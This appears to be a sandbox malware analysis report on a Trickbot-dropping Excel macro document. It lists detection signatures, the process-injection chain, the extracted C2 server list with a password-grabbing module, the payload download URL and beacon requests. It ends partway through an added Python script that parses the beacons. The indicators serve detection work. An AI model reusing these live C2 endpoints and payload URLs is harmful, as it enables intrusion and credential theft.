
Analysis Report SecuriteInfo.com.Exploit.Siggen3.10350.15803.23095

Overview

General Information

Sample Name: SecuriteInfo.com.Exploit.Siggen3.10350.15803.23095 (renamed file extension from 23095 to xls)
Analysis ID: 355598
MD5: 35ca616a3d685b7d1708eb901841879c
SHA1: b5073681d9bc3885987ee74ec1325d96152c46f0
SHA256: b9e1d6f26440468f142642382047529f94536f9601f4ffa70917c1b3ccac69e7

Detection

Hidden Macro 4.0 Trickbot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Document exploit detected (drops PE files)
Found malicious Excel 4.0 Macro
Found malware configuration
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Trickbot
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Found evasive API chain (trying to detect sleep duration tampering with parallel thread)
Hijacks the control flow in another process
May check the online IP address of the machine
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Suspicious Svchost Process
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Writes to foreign memory regions
Allocates a big amount of memory (probably used for heap spraying)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Connects to several IPs in different countries
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query network adapter information
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains embedded VBA macros
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Tries to load missing DLLs
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2316 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • rundll32.exe (PID: 2524 cmdline: rundll32 ..\BASE.BABAA,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
      • rundll32.exe (PID: 2480 cmdline: rundll32 ..\BASE.BABAA,DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)
        • wermgr.exe (PID: 2492 cmdline: C:\Windows\system32\wermgr.exe MD5: 41DF7355A5A907E2C1D7804EC028965D)
        • wermgr.exe (PID: 2408 cmdline: C:\Windows\system32\wermgr.exe MD5: 41DF7355A5A907E2C1D7804EC028965D)
          • svchost.exe (PID: 2296 cmdline: C:\Windows\system32\svchost.exe MD5: C78655BC80301D76ED4FEF1C1EA40A7D)
  • taskeng.exe (PID: 1544 cmdline: taskeng.exe {DA6299CA-95CA-4E9D-8945-2CC05321254C} S-1-5-18:NT AUTHORITY\System:Service: MD5: 65EA57712340C09B1B0C427B4848AE05)
    • rundll32.exe (PID: 2284 cmdline: C:\Windows\system32\rundll32.EXE 'C:\Users\user\AppData\Roaming\QNetMonitor7737977537\rpBASEtx.rrd',DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
  • cleanup

Malware Configuration

Threatname: Trickbot

{"gtag": "rob60", "C2 list": ["116.68.162.92:443", "190.239.34.181:443", "154.0.134.130:443", "187.95.136.38:443", "123.231.180.130:443", "109.69.4.201:443", "45.184.189.34:443", "193.8.194.96:443"], "modules": ["pwgrab", "mcconf"]}

Yara Overview

Initial Sample

Source: SecuriteInfo.com.Exploit.Siggen3.10350.15803.xls
Rule: SUSP_Excel4Macro_AutoOpen
Description: Detects Excel4 macro use with auto open / close
Author: John Lambert @JohnLaTwC
Strings:
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x26ca2:$s1: Excel
  • 0x27d0a:$s1: Excel
  • 0x35b4:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A

Memory Dumps

Source | Rule | Description | Author
00000004.00000002.2094061002.0000000000180000.00000040.00000001.sdmp | JoeSecurity_TrickBot_4 | Yara detected Trickbot | Joe Security
00000004.00000003.2089754481.00000000006C4000.00000004.00000001.sdmp | JoeSecurity_TrickBot_4 | Yara detected Trickbot | Joe Security
00000004.00000003.2089764139.00000000006C4000.00000004.00000001.sdmp | JoeSecurity_TrickBot_4 | Yara detected Trickbot | Joe Security
00000004.00000002.2094284509.0000000000690000.00000004.00000020.sdmp | JoeSecurity_TrickBot_4 | Yara detected Trickbot | Joe Security
00000004.00000002.2094761896.0000000002198000.00000004.00000001.sdmp | JoeSecurity_TrickBot_4 | Yara detected Trickbot | Joe Security

Unpacked PEs

Source | Rule | Description | Author
4.2.rundll32.exe.180000.0.raw.unpack | JoeSecurity_TrickBot_4 | Yara detected Trickbot | Joe Security
4.2.rundll32.exe.180000.0.unpack | JoeSecurity_TrickBot_4 | Yara detected Trickbot | Joe Security

Sigma Overview

System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell
Source: Process started | Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team | Data: Command: rundll32 ..\BASE.BABAA,DllRegisterServer, CommandLine: rundll32 ..\BASE.BABAA,DllRegisterServer, CommandLine|base64offset|contains: ], Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2316, ProcessCommandLine: rundll32 ..\BASE.BABAA,DllRegisterServer, ProcessId: 2524
Sigma detected: Suspicious Svchost Process
Source: Process started | Author: Florian Roth | Data: Command: C:\Windows\system32\svchost.exe, CommandLine: C:\Windows\system32\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Windows\system32\wermgr.exe, ParentImage: C:\Windows\System32\wermgr.exe, ParentProcessId: 2408, ProcessCommandLine: C:\Windows\system32\svchost.exe, ProcessId: 2296

Signature Overview

AV Detection:

Antivirus detection for URL or domain
Source: http://www.chipmania.it/mails/open.php | Avira URL Cloud: Label: malware
Found malware configuration
Source: wermgr.exe.2408.6.memstr | Malware Configuration Extractor: Trickbot {"gtag": "rob60", "C2 list": ["116.68.162.92:443", "190.239.34.181:443", "154.0.134.130:443", "187.95.136.38:443", "123.231.180.130:443", "109.69.4.201:443", "45.184.189.34:443", "193.8.194.96:443"], "modules": ["pwgrab", "mcconf"]}
Multi AV Scanner detection for submitted file
Source: SecuriteInfo.com.Exploit.Siggen3.10350.15803.xls | Virustotal: Detection: 11%
Source: SecuriteInfo.com.Exploit.Siggen3.10350.15803.xls | ReversingLabs: Detection: 27%
Yara detected Trickbot
Source: Yara match | File source: Process Memory Space: wermgr.exe PID: 2408, type: MEMORY
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_0007BCA0 CryptAcquireContextW,
Source: C:\Windows\System32\svchost.exe | Code function: 10_2_000000018008B68C CryptUnprotectData,

Compliance:

Uses insecure TLS / SSL version for HTTPS connection
Source: unknown | HTTPS traffic detected: 193.8.194.96:443 -> 192.168.2.22:49170 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 193.8.194.96:443 -> 192.168.2.22:49173 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 193.8.194.96:443 -> 192.168.2.22:49175 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 193.8.194.96:443 -> 192.168.2.22:49177 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 193.8.194.96:443 -> 192.168.2.22:49178 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 193.8.194.96:443 -> 192.168.2.22:49179 version: TLS 1.0
Uses new MSVCR Dlls
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Binary contains paths to debug symbols
Source: Binary string: F:\projects\cryptor_beta\Bin\Crypter\CrypterDllReleaseNoLogs\Win32\Crypter.pdb source: rundll32.exe, 00000004.00000002.2095142044.000000006E169000.00000002.00020000.sdmp
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_00061290 FindFirstFileW,FindNextFileW,
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_000646F0 FindFirstFileW,FindNextFileW,
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_0007FBB0 FindFirstFileW,SleepEx,FindNextFileW,

Software Vulnerabilities:

Document exploit detected (drops PE files)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: 10[1].jjkes.0.dr
Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\rundll32.exe
Source: excel.exe | Memory has grown: Private usage: 4MB later: 47MB
Source: C:\Windows\System32\wermgr.exe | Code function: 4x nop then dec eax
Source: C:\Windows\System32\wermgr.exe | Code function: 4x nop then cmp byte ptr [ecx+edx+01h], 00000000h
Source: C:\Windows\System32\wermgr.exe | Code function: 4x nop then movzx ecx, word ptr [eax+02h]
Source: C:\Windows\System32\wermgr.exe | Code function: 4x nop then mov ecx, 00004E20h
Source: C:\Windows\System32\wermgr.exe | Code function: 4x nop then movzx edx, word ptr [eax]
Source: C:\Windows\System32\wermgr.exe | Code function: 4x nop then inc dword ptr [esp+40h]
Source: C:\Windows\System32\wermgr.exe | Code function: 4x nop then inc ecx
Source: C:\Windows\System32\wermgr.exe | Code function: 4x nop then dec ecx
Source: C:\Windows\System32\wermgr.exe | Code function: 4x nop then inc esp
Source: C:\Windows\System32\wermgr.exe | Code function: 4x nop then movzx eax, byte ptr [ebx]
Source: C:\Windows\System32\wermgr.exe | Code function: 4x nop then inc edx
Source: C:\Windows\System32\wermgr.exe | Code function: 4x nop then movzx ebx, word ptr [eax]
Source: C:\Windows\System32\wermgr.exe | Code function: 4x nop then mov ebx, edx
Source: global traffic | DNS query: name: www.chipmania.it
Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 94.140.114.136:443
Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 185.81.0.78:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2404348 ET CNC Feodo Tracker Reported CnC Server TCP group 25 192.168.2.22:49166 -> 94.140.114.136:443
Source: Traffic | Snort IDS: 2404320 ET CNC Feodo Tracker Reported CnC Server TCP group 11 192.168.2.22:49170 -> 193.8.194.96:443
Source: Traffic | Snort IDS: 2021013 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC) 193.8.194.96:443 -> 192.168.2.22:49170
Source: Traffic | Snort IDS: 2021013 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC) 193.8.194.96:443 -> 192.168.2.22:49173
Source: Traffic | Snort IDS: 2404314 ET CNC Feodo Tracker Reported CnC Server TCP group 8 192.168.2.22:49174 -> 185.109.54.99:447
Source: Traffic | Snort IDS: 2021013 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC) 193.8.194.96:443 -> 192.168.2.22:49175
Source: Traffic | Snort IDS: 2021013 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC) 193.8.194.96:443 -> 192.168.2.22:49177
Source: Traffic | Snort IDS: 2021013 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC) 193.8.194.96:443 -> 192.168.2.22:49178
Source: Traffic | Snort IDS: 2021013 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC) 193.8.194.96:443 -> 192.168.2.22:49179
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | IPs: 116.68.162.92:443
Source: Malware configuration extractor | IPs: 190.239.34.181:443
Source: Malware configuration extractor | IPs: 154.0.134.130:443
Source: Malware configuration extractor | IPs: 187.95.136.38:443
Source: Malware configuration extractor | IPs: 123.231.180.130:443
Source: Malware configuration extractor | IPs: 109.69.4.201:443
Source: Malware configuration extractor | IPs: 45.184.189.34:443
Source: Malware configuration extractor | IPs: 193.8.194.96:443
May check the online IP address of the machine
Source: unknown | DNS query: name: wtfismyip.com
Source: unknown | Network traffic detected: IP country count 11
Source: global traffic | TCP traffic: 192.168.2.22:49174 -> 185.109.54.99:447
Source: Joe Sandbox View | IP Address: 185.81.0.78 185.81.0.78
Source: Joe Sandbox View | IP Address: 193.8.194.96 193.8.194.96
Source: Joe Sandbox View | ASN Name: LINTASARTA-AS-APNetworkAccessProviderandInternetServic LINTASARTA-AS-APNetworkAccessProviderandInternetServic
Source: Joe Sandbox View | ASN Name: TelefonicadelPeruSAAPE TelefonicadelPeruSAAPE
Source: Joe Sandbox View | JA3 fingerprint: 8c4a22651d328568ec66382a84fc505f
Source: global traffic | HTTP traffic detected: GET /mails/open.php HTTP/1.1 Accept: */* UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: www.chipmania.it Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /rob60/813435_W617601.8B73F080286CDBB0F9B96995D4E87F7B/83/ HTTP/1.1 Accept: */* Content-Type: multipart/form-data; boundary=---------FNVPIRVIEKQTDGGI Connection: Close User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 116.68.162.92:443 Content-Length: 282 Cache-Control: no-cache
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ
Source: global traffic | HTTP traffic detected: GET /text HTTP/1.1 Connection: Keep-Alive User-Agent: curl/7.71.0 Host: wtfismyip.com
Source: rundll32.exe, 00000003.00000002.2095309685.0000000001BE0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2094325254.0000000001D70000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2362993370.0000000033B30000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2357183823.0000000000850000.00000002.00000001.sdmp | String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: wermgr.exe, 00000006.00000002.2357305379.00000000003BD000.00000004.00000020.sdmp | String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: unknown | DNS traffic detected: queries for: www.chipmania.it
Source: wermgr.exe, 00000006.00000002.2357365100.0000000000423000.00000004.00000020.sdmp | String found in binary or memory: Https://193.8.194.96/rob60/813435_W617601.8B73F080286CDBB0F9B96995D4E87F7B/1/bnfhZJn91PhwAc8eqCIkI2c
Source: wermgr.exe, 00000006.00000002.2362023114.000000003205D000.00000004.00000040.sdmp | String found in binary or memory: http://109.69.4.201:443
Source: wermgr.exe, 00000006.00000002.2362068163.0000000032D8C000.00000004.00000040.sdmp, wermgr.exe, 00000006.00000002.2362023114.000000003205D000.00000004.00000040.sdmp | String found in binary or memory: http://116.68.162.92:443
Source: wermgr.exe, 00000006.00000002.2362023114.000000003205D000.00000004.00000040.sdmp | String found in binary or memory: http://123.231.180.130:443
Source: wermgr.exe, 00000006.00000002.2362023114.000000003205D000.00000004.00000040.sdmp | String found in binary or memory: http://154.0.134.130:443
Source: wermgr.exe, 00000006.00000002.2362023114.000000003205D000.00000004.00000040.sdmp | String found in binary or memory: http://187.95.136.38:443
Source: wermgr.exe, 00000006.00000002.2362023114.000000003205D000.00000004.00000040.sdmp | String found in binary or memory: http://190.239.34.181:443
Source: wermgr.exe, 00000006.00000002.2362023114.000000003205D000.00000004.00000040.sdmp | String found in binary or memory: http://45.184.189.34:443
Source: wermgr.exe, 00000006.00000002.2357305379.00000000003BD000.00000004.00000020.sdmp | String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: wermgr.exe, 00000006.00000002.2357305379.00000000003BD000.00000004.00000020.sdmp | String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: wermgr.exe, 00000006.00000002.2357305379.00000000003BD000.00000004.00000020.sdmp | String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: wermgr.exe, 00000006.00000002.2357305379.00000000003BD000.00000004.00000020.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: wermgr.exe, 00000006.00000002.2357305379.00000000003BD000.00000004.00000020.sdmp | String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: wermgr.exe, 00000006.00000002.2357305379.00000000003BD000.00000004.00000020.sdmp | String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: wermgr.exe, 00000006.00000003.2299229842.0000000033367000.00000004.00000001.sdmp | String found in binary or memory: http://crl.use
Source: wermgr.exe, 00000006.00000002.2357365100.0000000000423000.00000004.00000020.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: wermgr.exe, 00000006.00000002.2357305379.00000000003BD000.00000004.00000020.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enl
Source: rundll32.exe, 00000003.00000002.2095309685.0000000001BE0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2094325254.0000000001D70000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2362993370.0000000033B30000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2357183823.0000000000850000.00000002.00000001.sdmp | String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000003.00000002.2095309685.0000000001BE0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2094325254.0000000001D70000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2362993370.0000000033B30000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2357183823.0000000000850000.00000002.00000001.sdmp | String found in binary or memory: http://investor.msn.com/
Source: rundll32.exe, 00000003.00000002.2095488522.0000000001DC7000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2094574045.0000000001F57000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2363189685.0000000033D17000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2357387753.0000000000A37000.00000002.00000001.sdmp | String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000003.00000002.2095488522.0000000001DC7000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2094574045.0000000001F57000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2363189685.0000000033D17000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2357387753.0000000000A37000.00000002.00000001.sdmp | String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: wermgr.exe, 00000006.00000003.2299229842.0000000033367000.00000004.00000001.sdmp | String found in binary or memory: http://logo.veri
Source: wermgr.exe, 00000006.00000002.2357305379.00000000003BD000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.comodoca.com0
Source: wermgr.exe, 00000006.00000002.2357305379.00000000003BD000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.comodoca.com0%
Source: wermgr.exe, 00000006.00000002.2357305379.00000000003BD000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.comodoca.com0-
Source: wermgr.exe, 00000006.00000002.2357305379.00000000003BD000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.comodoca.com0/
Source: wermgr.exe, 00000006.00000002.2357305379.00000000003BD000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.comodoca.com05
Source: wermgr.exe, 00000006.00000002.2357305379.00000000003BD000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.entrust.net03
Source: wermgr.exe, 00000006.00000002.2357305379.00000000003BD000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.entrust.net0D
Source: wermgr.exe, 00000006.00000002.2362599901.0000000033740000.00000002.00000001.sdmp, taskeng.exe, 00000008.00000002.2357215363.0000000000800000.00000002.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: wermgr.exe, 00000006.00000002.2363434960.0000000034070000.00000002.00000001.sdmp | String found in binary or memory: http://servername/isapibackend.dll
Source: rundll32.exe, 00000003.00000002.2095488522.0000000001DC7000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2094574045.0000000001F57000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2363189685.0000000033D17000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2357387753.0000000000A37000.00000002.00000001.sdmp | String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: rundll32.exe, 00000003.00000002.2095488522.0000000001DC7000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2094574045.0000000001F57000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2363189685.0000000033D17000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2357387753.0000000000A37000.00000002.00000001.sdmp | String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: wermgr.exe, 00000006.00000002.2362599901.0000000033740000.00000002.00000001.sdmp, taskeng.exe, 00000008.00000002.2357215363.0000000000800000.00000002.00000001.sdmp | String found in binary or memory: http://www.%s.comPA
Source: wermgr.exe, 00000006.00000002.2357305379.00000000003BD000.00000004.00000020.sdmp | String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: wermgr.exe, 00000006.00000002.2357305379.00000000003BD000.00000004.00000020.sdmp | String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                Source: rundll32.exe, 00000003.00000002.2095309685.0000000001BE0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2094325254.0000000001D70000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2362993370.0000000033B30000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2357183823.0000000000850000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
                Source: rundll32.exe, 00000003.00000002.2095488522.0000000001DC7000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2094574045.0000000001F57000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2363189685.0000000033D17000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2357387753.0000000000A37000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
                Source: rundll32.exe, 00000003.00000002.2095309685.0000000001BE0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2094325254.0000000001D70000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2362993370.0000000033B30000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2357183823.0000000000850000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
                Source: rundll32.exe, 00000009.00000002.2357183823.0000000000850000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
                Source: wermgr.exe, 00000006.00000002.2362554842.00000000333A0000.00000004.00000001.sdmpString found in binary or memory: https://185.109.54.99:447/rob60/813435_W617601.8B73F080286CDBB0F9B96995D4E87F7B/5/pwgrab64/
                Source: wermgr.exe, 00000006.00000002.2357365100.0000000000423000.00000004.00000020.sdmpString found in binary or memory: https://193.8.194.96/rob60/813435_W617601.8B73F080286CDBB0F9B96995D4E87F7B/1/jvvnxhpdjrND3fPr33rZPHh
                Source: wermgr.exe, 00000006.00000002.2362547188.0000000033395000.00000004.00000001.sdmpString found in binary or memory: https://193.8.194.96/rob60/813435_W617601.8B73F080286CDBB0F9B96995D4E87F7B/1/rznnTbpNFJV19x1x/
                Source: wermgr.exe, 00000006.00000002.2357267628.0000000000340000.00000004.00000020.sdmpString found in binary or memory: https://193.8.194.96/rob60/813435_W617601.8B73F080286CDBB0F9B96995D4E87F7B/1/rznnTbpNFJV19x1x/U
                Source: wermgr.exe, 00000006.00000002.2362547188.0000000033395000.00000004.00000001.sdmpString found in binary or memory: https://193.8.194.96/rob60/813435_W617601.8B73F080286CDBB0F9B96995D4E87F7B/1/rznnTbpNFJV19x1x/o
                Source: wermgr.exe, 00000006.00000002.2362530513.000000003337E000.00000004.00000001.sdmpString found in binary or memory: https://193.8.194.96/rob60/813435_W617601.8B73F080286CDBB0F9B96995D4E87F7B/64/pwgrab/DEBG//e
                Source: wermgr.exe, 00000006.00000002.2362547188.0000000033395000.00000004.00000001.sdmpString found in binary or memory: https://193.8.194.96/rob60/813435_W617601.8B73F080286CDBB0F9B96995D4E87F7B/64/pwgrab/DPST//
                Source: wermgr.exe, 00000006.00000002.2362547188.0000000033395000.00000004.00000001.sdmpString found in binary or memory: https://193.8.194.96/rob60/813435_W617601.8B73F080286CDBB0F9B96995D4E87F7B/64/pwgrab/DPST//3
                Source: wermgr.exe, 00000006.00000002.2362536618.0000000033385000.00000004.00000001.sdmpString found in binary or memory: https://193.8.194.96/rob60/813435_W617601.8B73F080286CDBB0F9B96995D4E87F7B/64/pwgrab/DPST//W
                Source: wermgr.exe, 00000006.00000002.2357305379.00000000003BD000.00000004.00000020.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49179
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49178
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49177
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49176
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49175
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49173
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49170
                Source: unknownNetwork traffic detected: HTTP traffic on port 49175 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49169 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49170 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49176 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49173 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49177 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49178 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49179 -> 443
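The https://193.8.194.96/... and https://185.109.54.99:447/... strings above are Trickbot C2 beacons. Their path follows the bot's wire format: <gtag>/<client id>/<command number>/<argument>, where the client id is <computer name>_<Windows version tag>.<32 hex chars> (here 813435_W617601.8B73F0...). The parser below is an added example, not part of the Joe Sandbox report or of the malware: it pulls every URL out of the memory-string findings, keeps only those with that path shape, and groups them by C2 endpoint and command. The sample lines are copied from this report (with two certificate URLs that must be ignored); the names of command numbers 1, 5 and 64 are an assumption taken from public Trickbot write-ups, not from the report.

```python
"""Pull Trickbot C2 beacon URLs out of sandbox memory-string findings."""
import re
from dataclasses import dataclass
from urllib.parse import urlsplit

# Constructed input: memory-string findings in the report's
# "<source> | String found in binary or memory: <url>" shape, copied from
# this report, plus two certificate-related URLs that must be ignored.
SAMPLE_LINES = [
    "wermgr.exe, 00000006.00000002.2362554842.00000000333A0000.00000004.00000001.sdmp | String found in binary or memory: https://185.109.54.99:447/rob60/813435_W617601.8B73F080286CDBB0F9B96995D4E87F7B/5/pwgrab64/",
    "wermgr.exe, 00000006.00000002.2357365100.0000000000423000.00000004.00000020.sdmp | String found in binary or memory: https://193.8.194.96/rob60/813435_W617601.8B73F080286CDBB0F9B96995D4E87F7B/1/jvvnxhpdjrND3fPr33rZPHh",
    "wermgr.exe, 00000006.00000002.2362547188.0000000033395000.00000004.00000001.sdmp | String found in binary or memory: https://193.8.194.96/rob60/813435_W617601.8B73F080286CDBB0F9B96995D4E87F7B/1/rznnTbpNFJV19x1x/",
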